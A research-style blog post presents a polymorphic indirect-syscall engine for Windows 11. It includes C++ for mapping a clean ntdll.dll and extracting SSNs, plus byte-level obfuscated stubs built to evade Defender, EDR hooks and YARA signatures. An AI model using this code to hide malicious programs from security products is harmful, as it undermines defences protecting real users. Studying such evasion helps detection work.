Polymorphic Syscall Engine

In this blog we will be talking about syscalls, and how to make them a lil stealthy. The projects like HellsGateEXTERNAL LINK TOhttps://github.com/am0nsec/HellsGate Website Preview , Halo's GateEXTERNAL LINK TOhttps://github.com/boku7/AsmHalosGate, HellsHallEXTERNAL LINK TOhttps://github.com/Maldev-Academy/HellHall, etc. are the pioneers of these methods which work, but lacks stealth as they produce syscall stubs which are easily detected by basic yara rules. This blog is based on my project YetAnotherGate and will be covering the core logic some what in detail.

C++

Assembly (x64)

x64dbg

Setup

Everything which we are going to talk about is done on latest Windows and defender versions, which at the time of writing this blog are -

Windows OS

Edition: Windows 11 Pro
Version: 25H2
OS Build: 26200.7840

Defender Engine

Client: 4.18.26010.5
Engine: 1.1.26010.1
AV / AS: 1.445.222.0

Environment

Everything is created and built to test modern security with all security feature turned ON:

✓ Real-time protection

✓ Tamper Protection

✓ Memory integrity

✓ Memory access protection

✓ Microsoft Vulnerable Driver Blocklist

Warning

This is not just any project built to run in a vulnerable environment with security features turned off. This is some serious work and hence made just for education and research purposes.

Syscalls

Modern operating systems are built on the concept of Protection RingsEXTERNAL LINK TOhttps://en.wikipedia.org/wiki/Protection_ring Website Preview , User Space (Ring 3) is where your everyday programs run (web browsers, games, word processors). Programs here are restricted. They cannot directly access hardware, read arbitrary memory, or manage the network. Kernel Space (Ring 0) is the core operating system. It has absolute control over everything, the CPU, memory, hard drives, and network interfaces. If a user program wants to do something useful like read a file from the hard drive, print text to the screen, or send a network packet, it cannot do it directly. It must ask the kernel to do it. The syscall instruction is the mechanism for making that request.

Syscall Flow Path — `WriteFile` flow path from O'Reilly ↗EXTERNAL LINK TOhttps://oreilly.com

Website Preview — `WriteFile` flow path from O'Reilly ↗EXTERNAL LINK TOhttps://oreilly.com

A really nice example we can see it the flow path of WriteFile. We can see when the process calls WriteFile which exists in Kernel32.dll the function calls another less abstracted function NtWriteFile inside another system library ntdll.dll and then the cup transitions from user mode to kernel mode after the syscall instruction. ntdll.dll is a very important dll in this cat and mouse game between security venders and malware authors, as it contains all the SSNs for all the functions which we are going to talk about.

Syscalls via a debugger

Let us look at some syscall stubs via a debugger. We can use x64Dbg to catch any function and look what SSN (System Service Number) it has.

syscall_debugger_1 — `NtWriteFile` inside the debugger

In the above image, I have opened x64Dbg and to find SSN of any function we can simply, go to the "Symbols" tab and in the left panel we can see all the dlls which the process has loaded. We can find ntdll.dll in the bottom, clicking on which we can see all the functions it exports, one of them is NtWriteFile with Ordinal 688. Double clicking on the entry brings us back to the “CPU” tab where we can see the following:

syscall_debugger_2 — `NtWriteFile` syscall stub

From the debugger we can see something like this:

Assembly Stub
mov r10, rcx
mov eax, 8
syscall

These 3 instructions are very important, and if you look closely in the above image, every function has the same pattern, the only difference we can find is in the number in the mov eax, 8 instruction. The number 8 is the SSN for the function. So, this means if we know the SSN of a function we can create a syscall stub for it and execute it ourselves.

The Security Landscape

Now that we know what happens we a function is called and what syscalls are, we can now understand the security landscape and get a gist why syscalls are so important.

Security solutions love to hook functions in both user mode and kernel mode, for any security researcher or threat actor bypassing these hooks becomes very important in order not to get flagged. By placing the parameters on to the stack in compliance with x64 calling conventionEXTERNAL LINK TOhttps://learn.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-170 Website Preview and building and executing the syscall stub with the specific SSN one can bypass these user mode hooks.

EDRs/AVs know this and hide the SSN by patching the ntdll.dll for the process. Security vendors do this by injecting their own dll in the process which patches the ntdll.dll.

Knowing this, researchers have found ways to still get their hands on a clean ntdll.dll to get the SSNs, some of the techniques are BlindsideEXTERNAL LINK TOhttps://github.com/CymulateResearch/Blindside Website Preview , Reading from diskEXTERNAL LINK TOhttps://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++, etc. But all these techniques have their own detection vectors.

YetAnotherGate

YetAnotherGate focuses to eliminate one of the detection vectors in modern syscall implementations. Stubs generated by modern solutions can be easily detected by YARA rules like:

YARA rule
rule Detect_Direct_Syscall_Stub_08
{
    strings:
        // 4C 8B D1       : mov r10, rcx
        // B8 00 00 00 00 : mov eax, 0x00000000
        // 0F 05          : syscall
        $syscall_sequence = { 4C 8B D1 B8 ?? ?? ?? ?? 0F 05 }

    condition:
        $syscall_sequence
}

YetAnotherGate don’t just generates the subs but generates obfuscated assembly stubs via a method which obfuscates assembly via De-optimisation inspired by this Phrack articleEXTERNAL LINK TOhttps://phrack.org/issues/71/15_md#article Website Preview . You can find the working poc on the below link:

YetAnotherGateLoading...

View Repository ›

SSN retrival

As we talked about how security solutions like to hide the SSN, we will have to use one of the methods to retrieve a clean ntdll.dll. This part of the project always has a room for improvement as security solutions catch up really fast but right now we will retrieve a clean copy from KnownDlls.

Clean ntdll.dll

Windows caches frequently used system DLLs in a special kernel object directory called \KnownDlls to speed up process creation, So we can target it. This is not the best way to do this, but for now we will work with it.

A note

You will see me calling functions like fn.MyNtOpenSection instead of NtOpenSection, fn is just a structure to hold functions which are been dynamically linked and having My as a predecessor in the actual implementation. and you will also find some custom wrappers like err and norm for logging.

Get_clean_ntdll()

InitUnicodeString(usName, L"\\KnownDlls\\ntdll.dll");
InitializeObjectAttributes(&objAttr, &usName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NTSTATUS status = fn.MyNtOpenSection(&hSection, SECTION_MAP_EXECUTE | SECTION_MAP_READ, &objAttr);
if(!NT_SUCCESS(status))
{
  err("NtOpenSection failed: 0x%X", status);
  return 0;
}

We request a handle (hSection) to the memory section containing the clean ntdll.dll and ask for SECTION_MAP_EXECUTE and SECTION_MAP_READ permissions. We absolutely need the execute permission cause we will make the stubs reflective.. we will talk about it later.

Get_clean_ntdll()

status = fn.MyNtMapViewOfSection(hSection, fn.MyGetCurrentProcess(), &base, 0, 0, nullptr, &viewSize, ViewShare, 0, PAGE_EXECUTE_READ);
if(!NT_SUCCESS(status))
{
  err("MyNtMapViewOfSection Failed");
  return 0;
}

fn.MyNtClose(hSection);

sLibs.hUnhookedNtdll = (HMODULE)base;
norm("\nClean ntdll.dll address via fallback (KnownDlls :/ ) -> 0x", std::hex, CYAN"", sLibs.hUnhookedNtdll);

This is the core action. We take the handle to the clean ntdll.dll section and map it into the virtual memory space of the current process (MyGetCurrentProcess()). The newly mapped memory is marked as readable and executable, which is necessary because we intend to run it later. base now stores the address of the clean ntdll.dll.

SSN

Now all we need to do is, get the SSN for the functions we need. For this we will need to scan the bytes of the function for specific byte patterns. We should usually avoid relying on byte patterns as much as we can if Microsoft decides to change anything related to this in the OS, stuff might break for us, but in this case we can get away with it cause changing syscall stubs will require some serious changes in the OS, which is not going to happen soon. We should also see the hex values for each instruction, so we know what are we looking for:

Assembly InstructionHex / Opcode
mov r10, rcx4C 8B D1
mov eax, SSNB8 ?? ?? ?? ??
syscall0F 05

So, now we have a clean ntdll.dll we can use GetProcAddress to find the required function. Once we have the function's address we can traverse it like:

GetSSN()

BYTE* pBytes = reinterpret_cast<BYTE*>(vpfunction);
if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1)
{
    norm("\n");ok("Function ", sEntry[j].function_name," is Unhooked\n");
    for(int i = 0; i < 32; ++i)
    {
        if(sEntry[j].SSN != 0 && sEntry[j].pCleanSyscall != nullptr) break;
        if(!sEntry[j].SSN && i + 4 < 32 && pBytes[i] == 0xB8)
        {
            sEntry[j].SSN = *(DWORD*)(pBytes + i + 1);
            //norm("SSN:",CYAN" 0x", std::hex, sEntry[j].SSN, "\n"); 
        }

        if(!sEntry[j].pCleanSyscall && i + 1 < 32 && (pBytes[i] == 0x0F && pBytes[i+1] == 0x05))
        {
            sEntry[j].pCleanSyscall = pBytes + i;
            //norm("Address of the Syscall: ", CYAN"0x", std::hex, reinterpret_cast<void*>(sEntry[j].pCleanSyscall), "\n");
        }
    }
}

You might have noticed if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1) this check, just as a precaution, we check the starting bytes to check for any hooks. If it had a hook, we would have seen a jmp instruction. So, to get the SSN once we reach the mov eax instruction which has hex code 0xB8, we can just read a DWORD from the next byte *(DWORD*)(pBytes + i + 1) and we have the SSN. As we will make the stubs reflective we should also get the address of the syscall instruction and it looks like 0F 05 which is exactly what we check here pBytes[i] == 0x0F || pBytes[i+1] == 0x05. So, now we are all set to generate the stubs which we will be covering in the next section.

De-optimization

This here is the heart of this project, so we need to understand what evasion by De-optimization is. When developers write code, compilers translate it into assembly. Modern compilers are incredibly smart; they optimize the code to make it as short, fast, and efficient as possible. Because most software is compiled this way, security tools build their detection signatures based on these predictable, highly optimized patterns and in our case they can simply look for the syscall stubs. So, in the process of De-optimization we take these efficient and clean assembly code and then intentionally make them longer, messier and less efficient. This completely changes the signature of that specific code. We can see a very basic example that the phrack post mentions is:

        lea rcx, [0xDEAD] ------+->  lea rcx, [1CE54]
                                +->  sub rcx, EFA7

So, in this example we don't load 0xDEAD but we load 1CE54 and after these two instructions execute, the RCX register still holds 0xDEAD. The program's behavior remains identical, but the compiled bytes are now completely different.

Arithmetic Partitioning

Compilers naturally want to load hardcoded values like memory offsets, values, etc. directly into memory because it is fast. We can however break this, Instead of loading a value directly we can force the cpu to calculate it on the fly using randomized math:

Original
Mutated Sequence
mov eax, 12345678h
->
mov eax, 89ABCDEFh
sub eax, 77777777h
add dl, 25h
->
add dl, 6Ah
sub dl, 45h
sub cx, 10A5h
->
sub cx, 8B22h
add cx, 7A7Dh
push 0C0FFEEh
->
push 1A2B3C4Dh
sub dword ptr[esp], 196A3C5Fh
mov ebp, 0DEADBEEFh
->
mov ebp, 0CAFEBABEh
xor ebp, 14530451h

Logical Inverse

By leveraging mathematical properties specifically De Morgan's Laws we can take a single, predictable logical instruction and mutate it into a multi-step sequence. It looks completely different in hex, but the CPU computes the exact same final result.

Original
Mutated Sequence
xor r10d, 1337BEEFh
->
not r10d
xor r10d, 0ECC84110h
and al, 0Fh
->
not al
or al, 0F0h
not al
or edx, 0A5A5A5A5h
->
not edx
and edx, 5A5A5A5Ah
not edx

Register Swapping

It is exactly what it sounds like, Consider XOR RCX,0xAA. We can change the RCX register with any other 64-bit register by exchanging the value before and after the original instruction.

Original
Mutated Sequence
xor r8, 0A5A5h
->
xchg r8, r9
xor r9, 0A5A5h
xchg r8, r9
add r12, 100h
->
xchg r12, r13
add r13, 100h
xchg r12, r13
mov r14, r15
->
xchg r14, rbp
mov rbp, r15
xchg r14, rbp

Syscall Stubs

Now we can generate syscall stubs, it should look like:

Indirect Syscall Stub
mov r10, rcx
mov eax, SSN
jmp [syscall_loc]

Notice we dont call the syscall cause if we execute the instruction here, security solutions can see that the syscall instruction is executed from a very unlikely location and flag it. Hence we use the actual syscall instruction inside the ntdll.dll, so the origin looks from inside the system dll.

In our syscall stub, we won't use the original instructions but use the concept of de-optimization to create different variants for each of the original instructions, and make the syscall stub by randomly selecting the generated de-optimized variants for each of the instructions.

Step 1: Setup R10
Original
mov r10, rcx
↓
v1Av1Bv1C
  1 of 3 chosen
➔
Step 2: Load SSN
Original
mov eax, SSN
↓
v2Av2Bv2C
  1 of 3 chosen
➔
Step 3: Execute
Original
jmp [syscall_loc]
↓
v3Av3Bv3C
  1 of 3 chosen

`mov r10, rcx`

V1AStack Bridge & Redundant XOR

byte_stub[]
0x9c,                   // pushf
0x51,                   // push rcx
0x49, 0x31, 0xD2,       // xor r10, r10
0x4C, 0x87, 0x14, 0x24, // xchg r10, [rsp]
0x59,                   // pop rcx
0x9d                    // popf

The main logic here lies in push rcx and xchg r10, [rsp] instead of moving rcx straight into r10, we push the value of rcx onto the stack and then using the xchg instruction we put it into r10 hence breaking the pattern. xor r10, r10 is redundant. However, in malware/evasion dev, inserting redundant instructions alters the byte signature and throws off linear disassembly analysis. As we xor r10, r10 it alters the CPU's condition flags, by saving the flags to the stack, the stub ensures it doesn't accidentally break any surrounding program logic and hence the pushf and popf.

V1BNon-Destructive Stack Bridge

byte_stub[]
0x9c,                   // pushf
0x51,                   // push rcx
0x4C, 0x8B, 0x14, 0x24, // mov r10, [rsp]
0x59,                   // pop rcx
0x9d                    // popf

While the previous example altered the state of the CPU by wiping out the RCX register, this one takes a much cleaner, non-destructive approach using the stack as a temporary bridge. It effectively bypasses the static 0x4C, 0x8B, 0xD1 signature but leaves every single register exactly as it found it. The heart of this approach is mov r10, [rsp] Instead of popping the stack or swapping values, this instruction simply reads the memory address currently sitting at the top of the stack (RSP) and copies its contents directly into R10.

V1CRedundant AND & Opcode Synonym

byte_stub[]
0x9c,                                       // pushf
0x49, 0x81, 0xE2, 0x00, 0x00, 0x00, 0x00,   // and r10, 0
0x49, 0x89, 0xCA,                           // mov r10, rcx
0x9d                                        // popf

Here we use redundancy again, and r10, 0 performs a logical AND operation against R10 with 0. Anything ANDed with 0 becomes 0. This zeros out R10, Just like the xor r10, r10 from the first example, this instruction is functionally useless because the very next line overwrites R10 anyway. It acts purely as a 7-byte padding wall to break up linear signatures and confuse static analysis. mov r10, rcx is the hero here, notice the bytes: 0x49, 0x89, 0xCA. The standard, heavily-signatured byte sequence for mov r10, rcx that EDRs look for is 0x4C, 0x8B, 0xD1. This executes the exact same instruction but uses entirely different bytes. As we use an and we will also need to save the flags and hence the pushf and popf.

`mov eax, [SSN]`

V2AFragmented Additive Reconstruction

byte_stub[]
0x31, 0xC0,                                         // xor eax, eax
0xB0, 0x00,                                         // mov al, SSN_LOW
0x81, 0xC0, 0x00, 0x00, 0x00, 0x00                  // add eax, SSN_HIGH_SHIFTED

Instead of moving data into the full 32-bit EAX register, we target AL, which is the lowest 8-bit section of EAX. We move the lowest byte of the syscall number into this slot using mov al, SSN_LOW

info

If the SSN is under 0xFF or 255, the actual SSN is already fully loaded here.

We now add the remaining upper bytes of the syscall number to the EAX register by add eax, SSN_HIGH_SHIFTED and EAX now perfectly holds the intended SSN, ready for the syscall instruction.

V2BThe Bifurcated SSN Load

byte_stub[]
0xB8, 0x00, 0x00, 0x00, 0x00,                    // mov eax, X
0x05, 0x00, 0x00, 0x00, 0x00                     // add eax, Y

Instead of loading SSN directly, we construct it at the runtime. We create numberA and numberB such that numberA + number = SSN. This requires a lil bit of pre-processing as you can see.

  BYTE randNum = (BYTE)(rand() % 0x50);

  *(DWORD*)(byte_stub + 1) = randNum;
  *(DWORD*)(byte_stub + 6) = sEntry->SSN - randNum;

If you are still reading this blog, I would assume you know whats happening here and save my energy from explaining these basic stuff.

V2CStack-Bridged SSN Load

byte_stub[]
0x9C,                                             // pushfq
0x31, 0xC0,                                       // xor eax, eax
0x68, 0x00, 0x00, 0x00, 0x00,                     // push SSN
0x58,                                             // pop rax
0x9D,                                             // popfq

This stub completely avoids the standard mov eax, SSN by routing the SSN through the stack. Pretty basic, push SSN pushes the hardcoded SSN directly onto the top of the stack and pop rax pops the value sitting at the top of the stack (SSN) directly into the 64-bit RAX register. We will also need to save the falgs because we are also using xor.

`jmp [syscall_loc]`

V3AThe XCHG-RET Trampoline

byte_stub[]
0x50,                                                           // push rax
0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,     // mov rax, syscall_addr
0x48, 0x87, 0x04, 0x24,                                         // xchg rax, [rsp]
0xC3                                                            // ret

As we want to avoid detection by security solutions, we make our stub reflective and make a jump to the syscall address instead of directly hardcoding the syscall instruction. Remember from our previous stubs that RAX may hold our carefully constructed Syscall Service Number (SSN). If RAX changes, the kernel won't know what function you want to call. So, to avoid this we push the rax register on the stack. Now, mov rax, syscall_addr loads a memory address into RAX. This address points to a legitimate syscall instruction already sitting naturally somewhere inside ntdll.dll. The magic lies in, xchg rax, [rsp] it swaps the value in RAX (the ntdll.dll address) with the value sitting at the top of the stack ([RSP], which is your SSN) and finally ret instruction pops the memory address off the top of the stack and jumps to it effectively loading it into the CPU's Instruction Pointer.

V3BThe Pushf-Allocated ROP Jump

byte_stub[]
0x9C,                               // pushf
0x48, 0xC7, 0x04, 0x24,             // mov dword [rsp], imm32 (lower half)
0x00, 0x00, 0x00, 0x00,
0xC7, 0x44, 0x24, 0x04,             // mov dword [rsp+4], imm32 (upper half)
0x00, 0x00, 0x00, 0x00,
0xC3,                               // ret

This stub builds on the trampoline concept from the last example, but it introduces a completely new way to construct the jump address and allocate stack space. Instead of moving an address into a register and pushing it, this stub constructs the jump address directly inside the stack memory, piecemeal. Here pushf is used for a completely different reason: stealthy stack allocation. Pushing flags automatically subtracts 8 from the Stack Pointer (RSP = RSP - 8) we just allocated 8 bytes of space on the stack without using a highly visible sub rsp, 8 or push rax instruction.

info

The fact that it wrote the RFLAGS data into that space doesn't matter, because the next instructions will immediately overwrite it.

mov dword [rsp], imm32 takes the lower 32 bits of the target memory address and writes them directly into the lower 4 bytes of the space we just allocated on the stack. mov dword [rsp+4], imm32 takes the upper 32 bits of the target address and writes them directly into the upper 4 bytes of that same stack space (RSP + 4). The stack memory at [RSP] now perfectly contains the full 64-bit memory address.

info

You might have noticed, we pushed the flags but didnot pop the flags out. If you executed popf here, the CPU would take the 64-bit address we just painstakingly built and shove it into the RFLAGS register, removing it from the stack. That would ruin the payload and likely crash the program.

And finally ret pops the 64-bit value currently sitting at the top of the stack into the Instruction Pointer (RIP) and we are done.

V3BThe Basic Jump

byte_stub[]
0xFF, 0x25, 0x00, 0x00, 0x00, 0x00,                // jmp [rip+0]
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00     // syscall address

We could also just fall back to the old bread and butter as we are already avoiding the syscall via the jmp.

Future Improvements

`ntdll.dll` Sourcing

We heavily depend on known methods to fetch a clean ntdll.dll. While some methods currently work, others will likely fail as security solutions evolve. Implementing dynamic, robust sourcing is a top priority.

Instruction Variant Expansion

We plan to expand our mutation engine to add far more de-optimized variants for different instructions, drastically increasing the randomness and entropy of the generated stubs.

References

Windows API Call Floworeilly

›

Evasion by De-optimizationEge BALCI

›

syscallscrow

›

Direct Syscalls vs Indirect Syscallsredops

›

Direct Syscalls: A journey from high to lowredops

›

Understanding the Windows System Call Mechanismmedium

›

A Deep Dive Into Malicious Direct Syscall Detectionpaloaltonetworks

›

System Call in OS (Operating System): What is, Types and Examplesguru99

›

Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teamsmdsec

›

Syscalls with D/Invokeoffensivedefence

›

Bypass EDR’s memory protection, introduction to hookingmedium

›

GitHub - am0nsec/HellsGate: Original C Implementation of the Hell's Gate VX TechniqueGitHub

›

Setup​

Windows OS

Defender Engine

Environment

Syscalls​

Syscalls via a debugger​

The Security Landscape​

YetAnotherGate​

SSN retrival​

Clean ntdll.dll​

SSN​

De-optimization​

Arithmetic Partitioning​

Logical Inverse​

Register Swapping​

Syscall Stubs​

mov r10, rcx​

mov eax, [SSN]​

jmp [syscall_loc]​

Future Improvements​

ntdll.dll Sourcing

Instruction Variant Expansion

References​

Setup

Syscalls

Syscalls via a debugger

The Security Landscape

YetAnotherGate

SSN retrival

Clean ntdll.dll

SSN

De-optimization

Arithmetic Partitioning

Logical Inverse

Register Swapping

Syscall Stubs

`mov r10, rcx`

`mov eax, [SSN]`

`jmp [syscall_loc]`

Future Improvements

`ntdll.dll` Sourcing

References